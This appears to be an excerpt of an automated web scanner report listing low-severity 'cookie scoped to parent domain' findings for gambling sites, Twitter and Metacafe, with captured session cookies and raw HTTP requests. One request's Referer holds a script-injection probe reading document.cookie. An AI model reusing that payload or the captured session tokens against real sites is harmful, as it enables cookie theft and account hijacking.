<input type="hidden" name="__VIEWSTATE" value="dDw2NzAxOTI3NTU7dDw7bDxpPDE+Oz47bDx0PDtsPGk8MT47aTwzPjtpPDU+O2k8Nz47aTw5Pjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxsaVw+XDxhIGhyZWY9J2hvbWUuYXNweCdcPkhvbWVcPC9hXD5cPC9saVw+XDxsaVw+XDxhIGhyZWY9J2NvbnRlbnQuYXNweD9pZD04NTQ4NydcPkFib3V0IFVzXDwvYVw+XDwvbGlcPlw8bGlcPlw8YSBocmVmPSdjb250ZW50LmFzcHg/aWQ9ODU0OTQnXD5HYW1pbmcgU2VjdG9yc1w8L2FcPlw8L2xpXD5cPGxpXD5cPGEgaHJlZj0nY29udGVudC5hc3B4P2lkPTg1ODAzJ1w+TGVnaXNsYXRpb25cPC9hXD5cPC9saVw+XDxsaVw+XDxhIGhyZWY9J2NvbnRlbnQuYXNweD9pZD04NTgwNCdcPlJlc291cmNlc1w8L2FcPlw8L2xpXD5cPGxpXD5cPGEgaHJlZj0nY29udGVudC5hc3B4P2lkPTg1ODA1J1w+UmVzcG9uc2libGUgR2FtaW5nXDwvYVw+XDwvbGlcPlw8bGlcPlw8YSBocmVmPSdjb250ZW50LmFzcHg/aWQ9ODU4MDYnXD5NYWx0YVw8L2FcPlw8L2xpXD5cPGxpXD5cPGEgaHJlZj0nY29udGVudC5hc3B4P2lkPTg1ODA3J1w+TGljZW5jZWVzXDwvYVw+XDwvbGlcPjs+Pjs7Pjt0PHA8bDxUZXh0Oz47bDxcPGxpXD5cPGEgaHJlZj0nY29udGVudC5hc3B4P2lkPTg2OTQ5J1w+UmVtb3RlIEdhbWluZ1w8L2FcPlw8L2xpXD5cPGxpXD5cPGEgaHJlZj0nY29udGVudC5hc3B4P2lkPTg1OTIzJ1w+UGxheWVyIFN1cHBvcnRcPC9hXD5cPC9saVw+XDxsaVw+XDxhIGhyZWY9J2NvbnRlbnQuYXNweD9pZD04NTgwNCdcPkRvd25sb2Fkc1w8L2FcPlw8L2xpXD5cPGxpXD5cPGEgaHJlZj0nY29udGVudC5hc3B4P2lkPTI0NzUxOCdcPkZBUXNcPC9hXD5cPC9saVw+Oz4+Ozs+O3Q8cDxsPFRleHQ7PjtsPFw8dGFibGUgYm9yZGVyPSIwIiBhbGlnbj0iY2VudGVyIiBjZWxsc3BhY2luZz0iMCIgc3R5bGU9Im1hcmdpbi1ib3R0b206MTBweFw7Ilw+DQpcPHRib2R5XD4NClw8dHJcPg0KXDx0ZCBhbGlnbj0iY2VudGVyIlw+XDxpbWcgd2lkdGg9IjU1MCIgc3JjPSIuLi9jb21tb24vaW1hZ2VfcHJvdmlkZXIuYXNweD9pZD02MzM2MzkwNzgxNTY2NjI1MDAiIGFsdD0iV2VsY29tZSB0byBMR0EiIGhlaWdodD0iMTY1IiAvXD5cPC90ZFw+DQpcPC90clw+DQpcPC90Ym9keVw+DQpcPC90YWJsZVw+DQpcPHBcPlRoZSBMb3R0ZXJpZXMgYW5kIEdhbWluZyBBdXRob3JpdHkgKExHQSkgaXMgYSBwdWJsaWMgc2luZ2xlIHJlZ3VsYXRvcnkgYm9keSB0aGF0IGlzIHJlc3BvbnNpYmxlIGZvciB0aGUgZ292ZXJuYW5jZSBvZiBhbGwgZm9ybXMgb2YgZ2FtaW5nIGluIE1hbHRhLlw8L3BcPjs+Pjs7Pjt0PHA8bDxUZXh0Oz47bDxcPGxpXD5cPGEgaHJlZj0nY29udGVudC5hc3B4P2lkPTI3MDA1MidcPlw8cFw+XDxzdHJvbmdcPjExLzA1LzIwMTFcPC9zdHJvbmdcPlw8YnJcPkxHQSBMZWFkIFNwb25zb3IgaW4gTWlHU1w8L3BcPlw8cCBjbGFzcz0ndmlvJ1w+cmVhZCBtb3JlIMK7XDwvcFw+XDwvYVw+XDwvbGlcPlw8bGlcPlw8YSBocmVmPSdjb250ZW50LmFzcHg/aWQ9MjYzMDMxJ1w+XDxwXD5cPHN0cm9uZ1w+MjMvMDMvMjAxMVw8L3N0cm9uZ1w+XDxiclw+QW11c2VtZW50IE1hY2hpbmVzIFJlZ3VsYXRpb25zIC0gVHJhbnNpdG9yeSBQZXJpb2RcPC9wXD5cPHAgY2xhc3M9J3ZpbydcPnJlYWQgbW9yZSDCu1w8L3BcPlw8L2FcPlw8L2xpXD47Pj47Oz47dDxwPGw8VGV4dDs+O2w8XDxsaVw+XDxhIGhyZWY9J2NvbnRlbnQuYXNweD9pZD0yNjI2MjcnXD5cPHBcPlw8c3Ryb25nXD4yMS8wMy8yMDExXDwvc3Ryb25nXD5cPGJyXD5MR0EgTGVhZCBTcG9uc29yIGZvciBXR0JcPC9wXD5cPHAgY2xhc3M9J3ZpbydcPnJlYWQgbW9yZSDCu1w8L3BcPlw8L2FcPlw8L2xpXD5cPGxpXD5cPGEgaHJlZj0nY29udGVudC5hc3B4P2lkPTI1MjY0NydcPlw8cFw+XDxzdHJvbmdcPjAyLzAyLzIwMTFcPC9zdHJvbmdcPlw8YnJcPk1hbHRh4oCZcyBHYW1pbmcgUmVndWxhdG9yeSBFeHBlcmllbmNlcyBpbiBEZW1hbmRcPC9wXD5cPHAgY2xhc3M9J3ZpbydcPnJlYWQgbW9yZSDCu1w8L3BcPlw8L2FcPlw8L2xpXD47Pj47Oz47Pj47Pj47Pg==" />
...[SNIP]...

11. Cookie scoped to parent domain previous next
There are 244 instances of this issue:

http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json
http://br.winnings.com/
http://da.winnings.com/
http://de.winnings.com/
http://el.winnings.com/
http://es.winnings.com/
http://fi.winnings.com/
http://fr.winnings.com/
http://nl.winnings.com/
http://no.winnings.com/
http://pt.winnings.com/
http://sv.winnings.com/
http://www.metacafe.com/fplayer/
http://www.opensource.org/licenses/mit-license.php
http://www.vincite.net/
http://www.winnings.com/
http://www.winnings.com/xmlrpc.php
http://b.scorecardresearch.com/b
http://bid.openx.net/json
http://br.bigmoneyscratch.com/Home.aspx
http://br.karamba.com/Home.aspx
http://da.bigmoneyscratch.com/Home.aspx
http://da.karamba.com/Home.aspx
http://da.scratch2cash.com/Home.aspx
http://da.scratchcardheaven.com/Home.aspx
http://de.bigmoneyscratch.com/Home.aspx
http://de.karamba.com/Home.aspx
http://de.scratch2cash.com/Home.aspx
http://de.scratchcardheaven.com/Home.aspx
http://el.karamba.com/Home.aspx
http://es.bigmoneyscratch.com/Home.aspx
http://es.karamba.com/Home.aspx
http://es.scratch2cash.com/Home.aspx
http://es.scratchcardheaven.com/Home.aspx
http://fi.bigmoneyscratch.com/Home.aspx
http://fi.karamba.com/Home.aspx
http://fi.scratchcardheaven.com/Home.aspx
http://fr.bigmoneyscratch.com/Home.aspx
http://fr.karamba.com/Home.aspx
http://fr.scratch2cash.com/Home.aspx
http://fr.scratchcardheaven.com/Home.aspx
http://home.okscratchcards.com/AboutUs.aspx
http://home.okscratchcards.com/ContactUsMail.aspx
http://home.okscratchcards.com/FairPlay.aspx
http://home.okscratchcards.com/PlayersClub.aspx
http://home.okscratchcards.com/Promotions.aspx
http://home.okscratchcards.com/Responsible.aspx
http://home.okscratchcards.com/SecurityAndPrivacy.aspx
http://home.okscratchcards.com/Terms.aspx
http://home.okscratchcards.com/help.aspx
http://home.okscratchcards.com/visit.aspx
http://it.bigmoneyscratch.com/Home.aspx
http://it.karamba.com/Home.aspx
http://it.scratch2cash.com/Home.aspx
http://it.scratchcardheaven.com/Home.aspx
http://m.xp1.ru4.com/ad
http://nl.bigmoneyscratch.com/Home.aspx
http://nl.karamba.com/Home.aspx
http://nl.scratch2cash.com/Home.aspx
http://nl.scratchcardheaven.com/Home.aspx
http://no.bigmoneyscratch.com/Home.aspx
http://no.karamba.com/Home.aspx
http://no.scratchcardheaven.com/Home.aspx
http://pixel.invitemedia.com/data_sync
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-96ifrWFBpTdiA.gif
http://pt.bigmoneyscratch.com/Home.aspx
http://pt.karamba.com/Home.aspx
http://pt.scratch2cash.com/Home.aspx
http://pt.scratchcardheaven.com/Home.aspx
http://server.iad.liveperson.net/hc/15712222/
http://solutions.liveperson.com/ref/lppb.asp
http://sv.bigmoneyscratch.com/Home.aspx
http://sv.karamba.com/Home.aspx
http://sv.scratch2cash.com/Home.aspx
http://sv.scratchcardheaven.com/Home.aspx
http://va.px.invitemedia.com/goog_imp
http://winter.metacafe.com/Openx/www/delivery/lg.php
http://www.bigmoneyscratch.com/
http://www.bigmoneyscratch.com/AboutUs.aspx
http://www.bigmoneyscratch.com/Affiliates.aspx
http://www.bigmoneyscratch.com/ContactUsChat.aspx
http://www.bigmoneyscratch.com/ContactUsFax.aspx
http://www.bigmoneyscratch.com/ContactUsMail.aspx
http://www.bigmoneyscratch.com/ContactUsTel.aspx
http://www.bigmoneyscratch.com/FAQ.aspx
http://www.bigmoneyscratch.com/FairPlay.aspx
http://www.bigmoneyscratch.com/Help.aspx
http://www.bigmoneyscratch.com/Home.aspx
http://www.bigmoneyscratch.com/InviteFriend.aspx
http://www.bigmoneyscratch.com/Mobile.aspx
http://www.bigmoneyscratch.com/PlayersClub.aspx
http://www.bigmoneyscratch.com/Promotions.aspx
http://www.bigmoneyscratch.com/Responsible.aspx
http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx
http://www.bigmoneyscratch.com/Terms.aspx
http://www.bigmoneyscratch.com/UnderAge.aspx
http://www.facebook.com/
http://www.facebook.com/PrimeScratchCards
http://www.facebook.com/WinningsCom
http://www.facebook.com/crazyscratch
http://www.facebook.com/pages/BigMoneyScratch/156518521055171
http://www.facebook.com/pages/PrimeScratchCards/122783514413813
http://www.facebook.com/peoplespostcodelottery
http://www.hopa.com/
http://www.hopa.com/visit.aspx
http://www.info.crazyscratch.com/AboutUs.aspx
http://www.info.crazyscratch.com/ContactUsFax.aspx
http://www.info.crazyscratch.com/ContactUsMail.aspx
http://www.info.crazyscratch.com/ContactUsTel.aspx
http://www.info.crazyscratch.com/FairPlay.aspx
http://www.info.crazyscratch.com/Help.aspx
http://www.info.crazyscratch.com/InviteFriend.aspx
http://www.info.crazyscratch.com/PlayersClub.aspx
http://www.info.crazyscratch.com/Privacy.aspx
http://www.info.crazyscratch.com/Promotions.aspx
http://www.info.crazyscratch.com/Responsible.aspx
http://www.info.crazyscratch.com/Terms.aspx
http://www.info.crazyscratch.com/UnderAge.aspx
http://www.info.crazyscratch.com/visit.aspx
http://www.info.winnings.com/visit.aspx
http://www.karamba.com/
http://www.karamba.com/AboutUs.aspx
http://www.karamba.com/FairPlay.aspx
http://www.karamba.com/Help.aspx
http://www.karamba.com/Home.aspx
http://www.karamba.com/InviteFriend.aspx
http://www.karamba.com/PlayersClub.aspx
http://www.karamba.com/Privacy.aspx
http://www.karamba.com/Promotions.aspx
http://www.karamba.com/Responsible.aspx
http://www.karamba.com/Sitemap.aspx
http://www.karamba.com/Terms.aspx
http://www.karamba.com/UnderAge.aspx
http://www.karamba.com/click/Karamba.com/ENG/Home/
http://www.mundirasca.com/
http://www.mundirasca.com/AboutUs.aspx
http://www.mundirasca.com/ContactUsChat.aspx
http://www.mundirasca.com/ContactUsFax.aspx
http://www.mundirasca.com/ContactUsMail.aspx
http://www.mundirasca.com/ContactUsTel.aspx
http://www.mundirasca.com/FAQ.aspx
http://www.mundirasca.com/FairPlay.aspx
http://www.mundirasca.com/Help.aspx
http://www.mundirasca.com/Home.aspx
http://www.mundirasca.com/InviteFriend.aspx
http://www.mundirasca.com/PlayersClub.aspx
http://www.mundirasca.com/Promotions.aspx
http://www.mundirasca.com/Responsible.aspx
http://www.mundirasca.com/SecurityAndPrivacy.aspx
http://www.mundirasca.com/Terms.aspx
http://www.mundirasca.com/UnderAge.aspx
http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/
http://www.pclscratch.com/ContactUsMail.aspx
http://www.pclscratch.com/FairPlay.aspx
http://www.pclscratch.com/Promotions.aspx
http://www.pclscratch.com/Responsible.aspx
http://www.pclscratch.com/SecurityAndPrivacy.aspx
http://www.pclscratch.com/Terms.aspx
http://www.postcodelottery.com/AboutUs.htm
http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm
http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm
http://www.postcodelottery.com/Charities.htm
http://www.postcodelottery.com/DrawResults.htm
http://www.postcodelottery.com/FunGames.htm
http://www.postcodelottery.com/FunGames/FreeGames.htm
http://www.postcodelottery.com/FunGames/PaidGames.htm
http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm
http://www.postcodelottery.com/FunGames/PostcodeChallenge.htm
http://www.postcodelottery.com/Games/Scratchcards.htm
http://www.postcodelottery.com/Home.htm
http://www.postcodelottery.com/HowItWorks.htm
http://www.postcodelottery.com/MyAccount.htm
http://www.postcodelottery.com/RSS.htm
http://www.postcodelottery.com/Sitemap.htm
https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm
http://www.primegrattage.com/
http://www.primescratchcards.com/
http://www.primescratchcards.com/HelpDepositMethods.asp
http://www.primescratchcards.com/InviteFriend.asp
http://www.primescratchcards.com/Responsible.asp
http://www.primescratchcards.com/SecurityAndPrivacy.asp
http://www.primescratchcards.com/aboutus.asp
http://www.primescratchcards.com/affiliates.asp
http://www.primescratchcards.com/contactus.asp
http://www.primescratchcards.com/fairplay.asp
http://www.primescratchcards.com/help.asp
http://www.primescratchcards.com/index.asp
http://www.primescratchcards.com/media.asp
http://www.primescratchcards.com/playersclub.asp
http://www.primescratchcards.com/promotions.asp
http://www.primescratchcards.com/terms.asp
http://www.primescratchcards.com/underage.asp
http://www.primescratchcards.com.br/
http://www.scratch2cash.com/
http://www.scratch2cash.com/AboutUs.aspx
http://www.scratch2cash.com/ContactUsMail.aspx
http://www.scratch2cash.com/FairPlay.aspx
http://www.scratch2cash.com/Help.aspx
http://www.scratch2cash.com/Home.aspx
http://www.scratch2cash.com/InviteFriend.aspx
http://www.scratch2cash.com/PlayersClub.aspx
http://www.scratch2cash.com/Promotions.aspx
http://www.scratch2cash.com/Responsible.aspx
http://www.scratch2cash.com/SecurityAndPrivacy.aspx
http://www.scratch2cash.com/Sitemap.aspx
http://www.scratch2cash.com/Terms.aspx
http://www.scratch2cash.com/UnderAge.aspx
http://www.scratchcardheaven.com/
http://www.scratchcardheaven.com/AboutUs.aspx
http://www.scratchcardheaven.com/ContactUsMail.aspx
http://www.scratchcardheaven.com/FairPlay.aspx
http://www.scratchcardheaven.com/Help.aspx
http://www.scratchcardheaven.com/Home.aspx
http://www.scratchcardheaven.com/InviteFriend.aspx
http://www.scratchcardheaven.com/PlayersClub.aspx
http://www.scratchcardheaven.com/Promotions.aspx
http://www.scratchcardheaven.com/Responsible.aspx
http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx
http://www.scratchcardheaven.com/Terms.aspx
http://www.scratchcardheaven.com/UnderAge.aspx
http://www.svenskalotter.com/
http://www.svenskalotter.com/AboutUs.aspx
http://www.svenskalotter.com/Affiliates.aspx
http://www.svenskalotter.com/Charity.aspx
http://www.svenskalotter.com/ContactUsMail.aspx
http://www.svenskalotter.com/FairPlay.aspx
http://www.svenskalotter.com/Help.aspx
http://www.svenskalotter.com/Home.aspx
http://www.svenskalotter.com/InviteFriend.aspx
http://www.svenskalotter.com/PlayersClub.aspx
http://www.svenskalotter.com/Promotions.aspx
http://www.svenskalotter.com/Responsible.aspx
http://www.svenskalotter.com/SecurityAndPrivacy.aspx
http://www.svenskalotter.com/Terms.aspx
http://www.svenskalotter.com/UnderAge.aspx
http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/
http://www.thawte.com/
https://www.thawte.com/
http://www.verisign.co.uk/
http://www.youtube.com/user/CrazyScratchCom
http://www.youtube.com/user/PostcodeLottery
http://www.youtube.com/user/primescratchcards1
http://www.youtube.com/v/

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

11.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/Metacafe/lists/metacafe/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCbC2vgvAToHaWQiJTU3YWEwODgzYzhmNDJk%250AZWNjODAyY2IxOWMyZDIzYzEzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--bb094e11ffa55fe4d38d2f1900f6149571445d42; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/Metacafe/lists/metacafe/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1305550175438=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; guest_id=130530556419951159; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

11.2. http://br.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://br.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103123651; path=/; domain=.winnings.com
WinningsSID=b8ce8h87e1pqll04kbcnv4sh36; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=541024; expires=Tue, 15-May-2012 12:45:27 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: br.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.3. http://da.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://da.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103123277; path=/; domain=.winnings.com
WinningsSID=82gun5s9aot32rckk6dr6ngt71; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540655; expires=Tue, 15-May-2012 12:26:10 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: da.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.4. http://de.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://de.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103122867; path=/; domain=.winnings.com
WinningsSID=bo2hr723r5jhqb7k8l55c0tsp6; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540255; expires=Tue, 15-May-2012 12:00:03 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: de.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.5. http://el.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://el.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103123004; path=/; domain=.winnings.com
WinningsSID=m2prtrifja8qi72631j36fguj0; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540388; expires=Tue, 15-May-2012 12:08:44 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: el.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.6. http://es.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://es.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103123528; path=/; domain=.winnings.com
WinningsSID=6rfpoaacmos3pqv6u74edo7v02; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540903; expires=Tue, 15-May-2012 12:32:13 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: es.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.7. http://fi.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://fi.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103123051; path=/; domain=.winnings.com
WinningsSID=hhfnpksu4siu4pfgu3cjt3vs45; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540431; expires=Tue, 15-May-2012 12:10:55 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: fi.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.8. http://fr.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://fr.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103123274; path=/; domain=.winnings.com
WinningsSID=ct2se4ekv495kv3bi8qnrrbis5; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540651; expires=Tue, 15-May-2012 12:26:04 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: fr.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.9. http://nl.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://nl.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103123202; path=/; domain=.winnings.com
WinningsSID=9jhkgdc329m3l6ckield5tnpl7; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540579; expires=Tue, 15-May-2012 12:24:16 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: nl.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.10. http://no.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://no.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103123206; path=/; domain=.winnings.com
WinningsSID=tg684evsvkmguaeu71dlpar7c5; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540583; expires=Tue, 15-May-2012 12:24:21 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: no.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.11. http://pt.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pt.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103123196; path=/; domain=.winnings.com
WinningsSID=mi99ov4036kkfgf2v89k0a5qg6; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540573; expires=Tue, 15-May-2012 12:23:57 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: pt.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.12. http://sv.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sv.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103123554; path=/; domain=.winnings.com
WinningsSID=nr3a3rsougqdtponk6jao9tic6; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540929; expires=Tue, 15-May-2012 12:33:44 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: sv.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.13. http://www.metacafe.com/fplayer/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=b34cef86fb081c11b18f1c7533ccdcf4; path=/; domain=.metacafe.com
OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
OAID=b26d5505ed27474ffea988f3d3dd0b02; expires=Tue, 15-May-2012 12:25:14 GMT; path=/; domain=.metacafe.com
User=%7B%22sc%22%3A1%2C%22visitID%22%3A%228744ed5d828ea0d23416bbe1e22d1055%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:14 GMT; path=/; domain=.metacafe.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.14. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=51jln3d46i68pj609s4i8oat56; expires=Wed, 08-Jun-2011 16:18:37 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:17 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=51jln3d46i68pj609s4i8oat56; expires=Wed, 08-Jun-2011 16:18:37 GMT; path=/; domain=.opensource.org
Last-Modified: Mon, 16 May 2011 12:32:15 GMT
ETag: "683ef92c05accf8dc3002cfa2d153539"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
